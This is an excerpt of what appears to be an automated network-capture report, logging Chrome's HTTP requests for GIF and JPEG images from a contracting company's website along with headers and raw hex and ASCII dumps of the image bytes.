d5 e2 96 33 94 4b ca 34 3a 1d 0f 85 73 7e c6 07 e2 1d 39 1b b7 8a 00 c8
                                              Data Ascii: F9se0ECH4JpRS\wO9,G>INR H{(G!9'rj$"8db$N@h8?F#eiu>0g=p|Z?#GOG@_tR87*C13^|_XSLLe^:3K4:s~9
                                              2024-09-27 06:20:08 UTC6049INData Raw: fd 2f 09 8f a7 71 3e 94 4d 9d bd cf b3 c4 bd 1e 96 69 0f 2e 4a 04 71 b6 9b 00 dc 75 18 8f 13 8f d2 ea 0d ea 35 0f 06 5c 79 21 cc e3 b7 fc 51 fd e9 98 62 32 90 a8 c6 ae b7 e3 95 1a f1 d3 f2 40 f4 6d 6d f3 f1 75 73 32 31 8f 98 03 40 4f cb 23 ee 3c 7d 23 e6 f5 e3 cd 1c 97 5a 11 cc 4e 84 7e ff 00 43 01 ad ad a1 50 0d ab cb d5 f5 b8 ba 40 0e 59 6a 7e 18 8d 64 7d c1 f2 72 7e 2d d4 e7 fe c4 46 38 dd 6e 97 9a 5f f6 47 de e9 55 bd 08 ec 96 a7 d0 39 cf 3e 38 7c 53 88 f7 c8 07 e5 f3 c3 34 e1 ea 66 c9 29 8d c6 35 b8 f3 ee 14 19 97 4b 83 18 27 4b ab 8e 83 5d 7e af bf 47 7e df 69 8e 7d 87 d3 1e bf a6 1f ef 61 ff 00 2c 35 1e af 04 be 1c 90 3f ea 0f cb c6 1d 3e d0 49 1b bb 8f 9f e5 f7 af a1 86 44 03 b4 8b 02 55 5f 73 7d b5 d7 e8 4e 7d 87 d7 02 08 b1 af b9 5f 90 1d 38 88
                                              Data Ascii: /q>Mi.Jqu5\y!Qb2@mmus21@O#<}#ZN~CP@Yj~d}r~-F8n_GU9>8|S4f)5K'K]~G~i}a,5?>IDU_s}N}_8


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              62192.168.2.465398173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:08 UTC727OUTGET /uploads/dynamic/9/296e3d1f4ce8845a75130582a997c1a7.gif HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/certifications
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:08 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:08 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 12:02:55 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 476463
                                              Connection: close
                                              Content-Type: image/gif
                                              2024-09-27 06:20:08 UTC7931INData Raw: 47 49 46 38 39 61 00 05 58 02 f7 00 00 78 78 78 77 77 77 75 75 75 c2 c2 c2 76 76 76 c3 c3 c3 74 74 74 8c 8c 8c c1 c1 c1 bd bd bd 8b 8b 8b 73 73 73 ac ac ac c0 c0 c0 bf bf bf ad ad ad 8a 8a 8a a8 a8 a8 79 79 79 be be be 8d 8d 8d aa aa aa 72 72 72 a7 a7 a7 bc bc bc 8f 8f 8f af af af c4 c4 c4 b0 b0 b0 ab ab ab a9 a9 a9 89 89 89 a4 a4 a4 a3 a3 a3 ae ae ae a5 a5 a5 a6 a6 a6 88 88 88 8e 8e 8e bb bb bb 90 90 90 71 71 71 70 70 70 9f 9f 9f 87 87 87 a2 a2 a2 86 86 86 91 91 91 a1 a1 a1 93 93 93 b1 b1 b1 92 92 92 b9 b9 b9 85 85 85 97 97 97 9a 9a 9a ba ba ba 84 84 84 7a 7a 7a 94 94 94 99 99 99 b8 b8 b8 7b 7b 7b c5 c5 c5 98 98 98 a0 a0 a0 9d 9d 9d 81 81 81 82 82 82 9c 9c 9c b7 b7 b7 7f 7f 7f 6e 6e 6e 9e 9e 9e 6f 6f 6f b4 b4 b4 7e 7e 7e b2 b2 b2 96 96 96 9b 9b 9b b5 b5
                                              Data Ascii: GIF89aXxxxwwwuuuvvvtttsssyyyrrrqqqpppzzz{{{nnnooo~~~
                                              2024-09-27 06:20:08 UTC8000INData Raw: 21 1a 30 68 00 81 0d 6e 72 f1 27 a0 02 49 a4 92 4e 3c 09 05 c4 54 62 96 39 95 97 43 e9 a4 92 44 84 4a 2a 8f 3a 74 22 63 ae be 1c 48 a0 21 1a 8c 40 a9 b0 35 0f eb a0 82 08 2e 20 e1 c7 16 e4 dc 2d 88 8d ab 16 ff 94 36 ac 83 c0 8d c8 11 48 60 12 ca 07 a8 b4 12 25 29 b8 c4 60 82 8b 10 08 eb 87 b3 c8 00 23 8f 9e 82 1a 2a 11 ba 57 ae e4 6e 9c f1 ce 39 e7 a2 8c 42 4a a9 a6 98 f2 e9 a8 a2 84 b2 bb e5 9a 53 81 c5 15 57 5e 61 fc 15 55 54 31 65 72 53 2c b1 fc 72 cc 33 d7 5c 73 4a 3a f7 fc 73 cf 19 11 7d 74 46 3e b7 a4 f3 cb 29 9f 5c 95 57 5a 67 9c 71 58 62 77 25 76 99 6d c6 39 90 a4 f0 a0 8a 8c 1f b4 42 c0 a3 8f 8c 58 c2 0a 19 44 38 cc 83 a7 43 a8 ed d0 de 7a b3 f3 37 e8 6f 90 7e fa 27 84 90 6d be 16 80 24 81 a0 82 a0 28 1a 07 8f d0 f6 eb 2b b5 b5 12 ab 2c 9c e2 9a
                                              Data Ascii: !0hnr'IN<Tb9CDJ*:t"cH!@5. -6H`%)`#*Wn9BJSW^aUT1erS,r3\sJ:s}tF>)\WZgqXbw%vm9BXD8Cz7o~'m$(+,
                                              2024-09-27 06:20:08 UTC8000INData Raw: 22 19 04 22 d1 ff 00 6c 4a 41 10 90 00 12 fc 13 1a f4 01 27 08 42 18 d8 41 1a fc 93 17 d4 86 05 e0 06 01 10 80 00 98 88 59 a9 81 1a a4 88 12 ee c1 1b c0 41 1a 00 40 06 bc 00 02 ba c0 0b 44 40 0f 34 80 2b c0 03 3a 80 43 38 84 83 3a 7c 43 39 94 83 3b 9c 03 19 60 80 04 d8 41 18 04 80 09 90 1b b9 69 25 a1 28 47 73 90 64 68 89 96 4d 99 d6 69 c9 60 61 aa 56 0d 12 e6 b8 65 e5 0c 30 47 a9 4c 54 67 7c 86 04 80 69 59 29 41 17 d0 01 99 a2 01 12 2a a1 71 2d 02 27 6c 42 24 60 02 28 14 82 28 cc 02 2d dc 82 2e c8 8b 30 20 43 34 30 43 b9 78 61 b3 54 43 35 28 83 b0 02 eb 77 85 0b 1b 4a c3 1b 3a 83 7a b1 d7 1c 06 43 30 c0 d7 1d ee 82 b0 e0 02 2d d4 d7 7d 01 62 bf 94 42 c0 14 62 21 18 e2 21 26 a2 80 85 ab b8 16 18 24 46 62 c5 48 42 23 6c 02 7f 0a c2 1d d8 53 1a cc 01 1d 70
                                              Data Ascii: ""lJA'BAYA@D@4+:C8:|C9;`Ai%(GsdhMi`aVe0GLTg|iY)A*q-'lB$`((-.0 C40CxaTC5(wJ:zC0-}bBb!!&$FbHB#lSp
                                              2024-09-27 06:20:08 UTC8000INData Raw: 49 64 91 46 0e e2 47 92 7e 14 52 c8 28 4e 3a 09 4a 94 51 7e 42 a5 26 56 5e 89 65 96 59 5e c2 65 97 97 68 c2 e5 24 98 64 a2 c8 1e 6f 6c 61 07 1b 73 78 51 45 15 0b d0 24 41 7d 54 3c e5 82 0b 25 40 80 67 55 07 1c 40 01 05 7b 2a 50 82 0b 50 11 41 45 52 47 20 65 9f 51 57 9c 94 c5 51 4c 20 95 d4 10 43 4c 91 43 0e 51 4d 55 55 9f ab bd b0 95 13 51 00 c1 c3 13 45 08 91 44 10 62 85 10 02 08 8f 5d 50 81 5a 6b b1 e5 96 06 83 c9 f0 97 5e 73 dd 25 85 11 3d f4 40 03 0d 38 fc fa eb 09 27 60 40 2c 06 09 1c 3b 41 b2 ca 3a e0 40 03 ce 3e eb 2c 02 03 14 b0 c1 06 3f 8c 31 86 16 60 d4 81 c7 1f 7a fc 11 48 ff 25 95 74 12 4a 2a b0 b8 f2 ca 2b aa 58 42 09 25 8c ac 42 0c bc db cc 3b 2f 37 dc d0 8b 2f 31 fa ae c2 ef 2a 8c b4 6b 49 c0 aa a4 eb 0a 2c 06 a7 12 8a 27 9d 88 9b 48 20 7f
                                              Data Ascii: IdFG~R(N:JQ~B&V^eY^eh$dolasxQE$A}T<%@gU@{*PPAERG eQWQL CLCQMUUQEDb]PZk^s%=@8'`@,;A:@>,?1`zH%tJ*+XB%B;/7/1*kI,'H
                                              2024-09-27 06:20:08 UTC8000INData Raw: 7e 39 2d de ea ad b0 03 3b fd 13 19 93 19 90 02 40 00 fd 30 a9 9a c9 99 2e d2 2e ee 7a 80 96 aa bb 08 a8 0e 98 52 4d d5 b4 0e c1 bb 2c cc 2a c2 d8 34 4d ec 10 92 77 42 3c 85 b0 a3 9e fa a9 26 91 12 1b 88 82 16 eb b8 0f 18 93 1c 98 46 67 74 2a 43 4b 81 a9 41 02 aa fa 33 d1 db 13 45 c9 13 d4 13 be e9 84 94 df b3 ce fb 5a 3d d5 f3 2f d9 7b bd 4a 71 3d dd b1 13 e6 e4 8b e3 53 be e8 7c ce 06 2a bd f4 ff ec aa 06 c2 45 f5 24 bd bb 39 94 d5 59 94 f1 ac 4e d6 93 1d 00 43 95 05 78 15 5b b9 95 62 1c 0c 91 d3 26 db e0 ca 66 42 a7 22 68 cb 11 88 27 79 6a 42 2a 5c 02 f1 a3 01 d1 72 00 04 d8 ba 7f 09 3b 8e d1 ad fc fb 98 91 d1 cc 95 41 00 f8 c0 80 9b 31 82 cf b2 82 12 d4 80 79 e2 0e cf 1a 0f 1c 48 80 08 d5 17 32 80 91 3a c8 03 0a c9 90 0d 09 05 11 29 11 4f 80 98 0b b9
                                              Data Ascii: ~9-;@0..zRM,*4MwB<&Fgt*CKA3EZ=/{Jq=S|*E$9YNCx[b&fB"h'yjB*\r;A1yH2:)O
                                              2024-09-27 06:20:08 UTC8000INData Raw: b0 26 d1 ba 75 45 d7 20 5f c1 86 0d db 95 ec 56 ac 45 d0 56 55 fb e4 46 db 1b 52 a7 52 15 a2 75 05 0c bb 2d 42 80 00 71 81 c4 05 0f 1e 2a 74 e8 c0 80 c1 03 11 22 34 70 50 bc 58 46 63 19 8b 39 68 90 3c 59 c3 ff 61 cb 87 1f 64 7e 40 98 33 03 c1 15 2a fc 8d 10 e1 6f e9 08 17 50 a3 26 41 62 44 eb 11 7a 61 83 08 11 a2 45 ed 16 76 61 88 ed ba 55 eb d9 b4 6c dd be 95 0a 84 38 10 1b c7 8f 3f 55 ee 64 e9 0e e7 47 67 20 45 4a 74 c6 8b a0 28 32 98 d0 a9 a0 c4 87 12 2e 5c d4 c8 91 72 c8 c7 2b 3e 0e 02 20 20 40 c0 82 14 29 94 54 91 df c5 4b 1c 3a 6e f0 a7 49 83 e6 cc 9a 30 61 b6 68 a3 8c 32 de b8 63 0f 3e f8 00 04 90 3e 04 69 b0 c1 3e 00 41 70 8f 3b de 78 c3 8c 2d b6 58 e3 8c 33 d2 50 c3 0d 39 e2 f0 c2 8b 2e c4 e0 a2 0a 24 54 50 41 89 14 59 4c 51 09 25 90 88 11 89 17
                                              Data Ascii: &uE _VEVUFRRu-Bq*t"4pPXFc9h<Yad~@3*oP&AbDzaEvaUl8?UdGg EJt(2.\r+> @)TK:nI0ah2c>>i>Ap;x-X3P9.$TPAYLQ%
                                              2024-09-27 06:20:08 UTC8000INData Raw: 82 6f f2 66 6f ff 7d a2 09 7f d2 6f fd 84 70 a7 12 8e 08 77 28 95 72 09 e0 f8 27 04 87 29 90 12 29 8d e0 2a 10 37 8f 9c b0 09 17 b7 09 0f 37 8f 1c a7 2b 84 00 2d ad b5 07 22 c7 31 6a b7 76 64 b5 1e 2b 73 1b e6 61 1b d0 11 77 ed a1 32 b2 a7 69 95 86 69 24 73 1d b3 55 90 7b 33 69 0d 39 77 d0 41 88 28 33 1d d8 61 07 6b f0 73 e0 02 37 11 d7 08 8b 82 09 c4 e4 07 f3 76 09 92 60 7b b9 d2 07 e5 a2 2d 23 37 2f 4a 55 2f 18 23 93 f1 b2 2d dd e2 51 00 39 2d 37 c9 2d ae 75 54 50 37 2d 41 35 94 d4 e2 74 26 c5 30 2a 77 76 0f 13 73 5b e0 31 db f1 55 6a 47 56 3a 97 91 0d f9 1d b8 21 07 94 66 90 58 79 1e e3 91 1b bd c1 05 c4 f1 77 f5 61 01 82 c4 38 3a 90 05 43 30 58 25 d0 66 97 a3 00 26 00 41 51 20 16 09 91 04 36 96 42 47 76 01 61 93 12 25 11 36 f4 c7 01 4d a0 59 50 d0 04
                                              Data Ascii: ofo}opw(r'))*77+-"1jvd+saw2ii$sU{3i9wA(3aks7v`{-#7/JU/#-Q9-7-uTP7-A5t&0*wvs[1UjGV:!fXywa8:C0X%f&AQ 6BGva%6MYP
                                              2024-09-27 06:20:08 UTC8000INData Raw: e3 ec 7b bb 99 30 eb ba 69 e5 cc 1d aa c7 69 c8 0d 09 8d 78 59 ec c3 ac e3 d5 cc 69 cd d8 95 15 9e bb ee 3e 48 30 1b 41 40 04 af 91 04 e6 41 7a ca b2 de cb 3b 84 b6 96 84 8b 8d 4c b0 f1 3e 65 f7 9a 4d 08 7d ed b9 fa 30 80 15 34 70 03 98 50 df ff cc e5 14 50 e6 32 32 00 d4 30 8d d3 38 0d 37 1b ef 34 b2 df 5f fd 55 60 4d ef f4 b6 5f 35 fa 65 3f d9 93 3b f1 13 2a e8 df 3d 09 f0 32 92 00 9d c8 02 03 b8 16 24 58 00 fb 1d 02 75 8c 93 12 40 01 20 5c 81 08 a8 00 06 e0 00 4e cb b4 25 b0 82 25 90 82 42 93 34 44 3b e3 2a 04 63 47 04 08 1a 3d 68 10 a4 81 03 c7 89 84 13 12 60 60 78 02 c3 84 85 46 ff 64 3c 20 c1 63 07 04 26 12 7c 0c 79 01 62 c4 12 83 27 12 44 2c 89 e1 e4 c9 04 2a 57 aa 2c 59 92 25 49 97 32 67 be 8c e9 72 25 cd 9c 37 59 ca 84 e9 53 a5 83 9d 2a 51 0e 25
                                              Data Ascii: {0iixYi>H0A@Az;L>eM}04pPP220874_U`M_5e?;*=2$Xu@ \N%%B4D;*cG=h``xFd< c&|yb'D,*W,Y%I2gr%7YS*Q%
                                              2024-09-27 06:20:08 UTC8000INData Raw: 60 07 6e 40 08 82 00 ac ba ec cb 70 82 27 24 4e ac 84 e2 4a c6 22 88 28 0e 87 bc 2a 88 7e a8 cb 50 a7 4c 90 e8 02 2e 82 4b 26 ee ab bc 04 23 be a4 e3 74 42 2d 62 e2 75 18 8a 06 30 c0 57 1a 20 ea ce 25 5d e4 e5 e8 0e cb ef 50 2b ee 8e 0e 0b a9 b0 b8 62 a9 59 ac 06 b2 4e 00 6e 68 a0 b2 46 86 8c 4e ea 88 58 30 02 f2 0a 53 5a c2 0a b4 49 e4 74 a5 01 0a c0 5b a8 ee b4 02 4f e5 5c 2b eb 6c 4b b6 46 0f ff b7 72 8b f0 0e cf c5 84 4b e0 88 4b c6 92 c5 66 6e cc 60 74 4c a2 46 a6 a3 1e c0 4f 3c 00 4c 92 af be 98 e4 06 b2 2b 0a 50 04 05 ca 87 7f fc a3 43 4c 64 07 80 60 49 e6 2a 08 4e a7 e3 9a 48 8a 2e 4f 4e 1c 51 72 4a e7 2a 82 82 50 a4 cc 50 5a 04 44 42 04 05 56 c4 16 6f 31 45 52 c4 44 72 31 45 06 0c 46 5e a4 47 7a 64 48 9c 64 05 2c 85 2a 3e cb 67 3a 65 55 12 a0 b4
                                              Data Ascii: `n@p'$NJ"(*~PL.K&#tB-bu0W %]P+bYNnhFNX0SZIt[O\+lKFrKKfn`tLFO<L+PCLd`I*NH.ONQrJ*PPZDBVo1ERDr1EF^GzdHd,*>g:eU
                                              2024-09-27 06:20:08 UTC8000INData Raw: 06 93 ab a8 12 47 b7 2c 3b 25 04 31 78 cc 62 5d 13 96 81 13 cd 5c 9b 5b 75 e5 ef e5 1e 54 51 4c b5 61 76 fc f1 15 bf 97 a4 05 d2 ad db d3 e3 7b 11 ed 18 f2 c1 1e 02 e9 ee 73 7d b2 b4 cc 18 c3 a3 fa 45 d0 38 ff 22 25 eb 9c 56 3d 82 56 3c 1a c3 54 d7 1b bf 01 14 fa cc cf 1f d5 1a fe dc 30 ee e7 83 b1 da ce 06 86 55 5a 55 30 3f ca 9e c2 3a 87 01 76 5f 39 92 a3 db d5 5d f5 77 16 6c 67 91 18 ec 16 6f a1 3d 9b c6 a9 42 90 2c 51 f0 02 7f 53 02 b2 48 04 95 e2 03 01 20 00 7f a2 04 38 cb 05 8e e2 f3 39 47 28 16 40 00 4d c3 04 f5 ea 02 1f f0 37 a7 59 93 2a 51 ed ba 6c 93 1f 18 59 73 23 82 b2 98 03 95 b5 d4 3f c7 04 59 cf 04 3f 77 04 4b cd d4 0d eb b0 b7 28 f6 63 9f b0 4e fd d4 0f 2b b1 2e 40 8c bf 6c 8c 18 ae 80 33 a0 cb 1c 7e 65 2e a1 69 15 30 e9 e7 14 2e b4 f4 23
                                              Data Ascii: G,;%1xb]\[uTQLav{s}E8"%V=V<T0UZU0?:v_9]wlgo=B,QSH 89G(@M7Y*QlYs#?Y?wK(cN+.@l3~e.i0.#


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              63192.168.2.465399173.231.215.118443
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:08 UTC758OUTGET /images/bg/14.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/certifications
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              Range: bytes=135930-135930
                                              If-Range: Fri, 30 Dec 2022 22:22:48 GMT
                                              2024-09-27 06:20:08 UTC313INHTTP/1.1 206 Partial Content
                                              Date: Fri, 27 Sep 2024 06:20:08 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 30 Dec 2022 22:22:48 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 1
                                              Content-Range: bytes 135930-135930/165418
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:08 UTC1INData Raw: 34
                                              Data Ascii: 4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              64192.168.2.465401173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:08 UTC734OUTGET /uploads/certifications/2/4e78ca5f7dd4e2d66f3b7d895ae18bd3.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/certifications
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:08 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:08 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 06:39:02 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 47800
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:08 UTC7931INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 0a 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                              Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                              2024-09-27 06:20:08 UTC8000INData Raw: 60 32 9a 96 87 4d 7d de c4 0f b6 41 20 6a 78 7c df c0 ba e9 f5 dd 1c 32 e4 f8 f5 8c 8f 89 8f 7f 9b e1 75 e2 7f 8c 7e 2a 7a 19 c8 c7 06 31 ac 63 de 80 27 e7 ad 7b 02 07 d7 46 71 98 b8 90 47 b1 65 38 c7 e2 20 7b df 0a 3f 82 e1 fc 20 cb ad e9 8c 80 84 26 65 8c 9b 12 d3 47 cb fc 1f f0 78 7e 33 8e 7d 67 5d 29 4e 72 91 88 a9 55 57 ef a0 e0 04 0f b2 b5 04 1e 1f 8d fc 33 3e 5c 50 eb 7f 0e c9 23 38 e2 c7 93 61 3e cb 1f 7e 86 bb 3c 7f f9 6f f5 53 fc 37 26 2c 99 0f fe 0f d4 dc 09 f0 94 4d 59 fd f8 3e c4 0f be dc 3c 42 37 c7 c4 3f 1d ff 00 96 ff 00 e1 b8 bf 10 e9 b3 61 cf 7b 63 9b 77 94 d6 bb 69 e6 fc 37 f0 7e 9f aa eb fa 8e 97 26 ef 4f 15 ed a9 6b cd 6a 81 f7 7b 87 8a 83 7c 3f 0d f8 c7 4f d3 e3 fc 4b 16 0c e4 c7 a7 86 28 40 ca f5 da 04 ab 5f a1 db f0 18 88 7e 25 28
                                              Data Ascii: `2M}A jx|2u~*z1c'{FqGe8 {? &eGx~3}g])NrUW3>\P#8a>~<oS7&,MY><B7?a{cwi7~&Okj{|?OK(@_~%(
                                              2024-09-27 06:20:08 UTC8000INData Raw: 44 3e 00 7e c7 9b a6 cb 97 ab 94 a3 d7 09 48 88 d5 59 ec 36 d5 73 cf 04 3f 71 f8 2e 4c f9 7a 3c 73 ea 6f d4 23 5b d0 d5 e9 7f 27 b0 e1 c7 29 6f 31 06 5e 35 ab a3 0a 2a aa 80 0b 86 2f 89 da 66 81 73 c3 ca 05 65 e1 18 78 46 63 c3 78 85 45 a0 8c dd 9c e1 f1 0f 7b ae 6e ce 70 f8 82 21 43 43 29 39 ba cb 48 9f 69 72 e5 03 4f 86 1e f6 07 21 ac 9c d7 82 e3 17 24 01 93 e2 29 80 af 31 ec c9 b9 1d 3b 96 a6 6b ca 38 08 00 6b 21 ef 7a 5e 7c 43 cd ee 7a 13 28 aa ab 00 aa aa 02 aa a8 0a aa a0 2a aa 80 aa aa 02 aa a8 0a aa a0 2a aa 80 aa aa 02 aa a8 1e 37 fe 5c 5d 7e 4e 8f a6 11 c3 fd dc b2 18 e1 ec be ef 27 e2 5d 46 4f c0 fa 08 63 c7 23 3c f3 3b 77 cc ee d6 b5 3a fd 00 27 ff 00 2e ab c6 3a 7e a4 8b 86 2c a0 cb f7 f9 3b ff 00 e5 c7 f8 7c ff 00 11 e9 a3 2e 9f cd 38 1d f1
                                              Data Ascii: D>~HY6s?q.Lz<so#[')o1^5*/fsexFcxE{np!CC)9HirO!$)1;k8k!z^|Cz(**7\]~N']FOc#<;w:'.:~,;|.8
                                              2024-09-27 06:20:08 UTC8000INData Raw: 64 34 35 ee db 13 e4 0a b4 00 7b 08 94 9b b1 48 38 62 7b 57 b9 63 0d a6 ec 9f 7a 06 8a aa 80 aa aa 02 aa a8 0a aa a0 2a aa 80 aa aa 02 aa a8 0a aa a0 2a aa 80 aa aa 02 aa a8 0a aa a0 44 86 a0 f8 34 0a 5c 8e 42 4d 40 5f b7 b2 05 6b ba fb 36 e4 21 22 6c 9d 47 67 54 05 55 50 26 62 c1 0e 11 96 d3 6f 4b cd 31 45 a8 07 24 6b 51 c1 5c 7a dc 7c 56 12 fb 27 82 82 0c 24 88 4b 63 cd 1a ee 17 20 a3 63 82 cc 4e d3 6d 00 77 06 e8 b8 c8 51 a6 e0 74 1e c2 c0 66 ef 8b e1 72 9e 92 2e d8 f4 88 4c a5 a0 8b 14 52 ac 07 31 06 05 de 24 48 22 70 dc 3d ae 31 91 81 68 0e 48 6d 3e c6 1e 9d 24 3d 8e 13 81 89 f6 22 12 aa ad 05 e2 f8 9e 87 9f 17 c4 f4 39 28 aa aa 02 aa a8 0b cb 2e 4b d4 f2 cb 92 d4 00 aa ad 20 ba 63 85 ea 51 08 5e a7 87 69 11 11 65 80 13 96 d1 ed 71 84 77 1d 56 cc cb
                                              Data Ascii: d45{H8b{Wcz**D4\BM@_k6!"lGgTUP&boK1E$kQ\z|V'$Kc cNmwQtfr.LR1$H"p=1hHm>$="9(.K cQ^ieqwV
                                              2024-09-27 06:20:08 UTC8000INData Raw: 6c 90 84 65 11 1a d2 32 de 47 3f 6e 5f 17 7d 39 4f fd 53 fc b8 c7 7f 9b d5 f5 f2 4b 6f c6 77 6e ae 78 1a 7f c9 7d 45 40 f0 cf e0 04 e3 8e 3f 58 e9 09 e3 91 db cf a9 31 29 1e 79 97 c2 7d 8d f5 5f 87 48 e2 cb 82 37 2c 9d 44 a5 2f 52 bc b0 1a 50 3e c0 00 03 c5 f6 55 03 9b 2f 4f 93 d2 38 f0 4c 42 67 99 ed be 79 35 a6 af 1e 4f c1 fd 58 46 13 9d 11 09 62 96 c8 ed 1b 64 41 34 35 ab aa ef a1 3d df 55 50 38 23 d1 e6 8e 59 64 f5 23 5b 4c 71 c7 d3 f8 3c 35 dd c7 72 34 bd 35 a0 ed d3 74 a3 0c a7 94 eb 93 21 89 99 1a 0f 28 ad 03 d2 a8 18 75 79 7d 2c 52 9f 70 34 f7 bf 34 7c a3 5e cf b1 f8 be 5d 23 8b c4 ee 3f 27 c1 ea e7 b7 19 f1 3a 35 29 65 4a 5a 47 9b 29 6f 91 91 ee 6d 01 09 0f ac f7 9f a2 aa ab e3 3e 78 ab cf d4 75 90 e9 e5 18 c8 48 ca 57 42 11 32 3a 73 c3 97 fd 63
                                              Data Ascii: le2G?n_}9OSKownx}E@?X1)y}_H7,D/RP>U/O8LBgy5OXFbdA45=UP8#Yd#[Lq<5r45t!(uy},Rp44|^]#?':5)eJZG)om>xuHWB2:sc
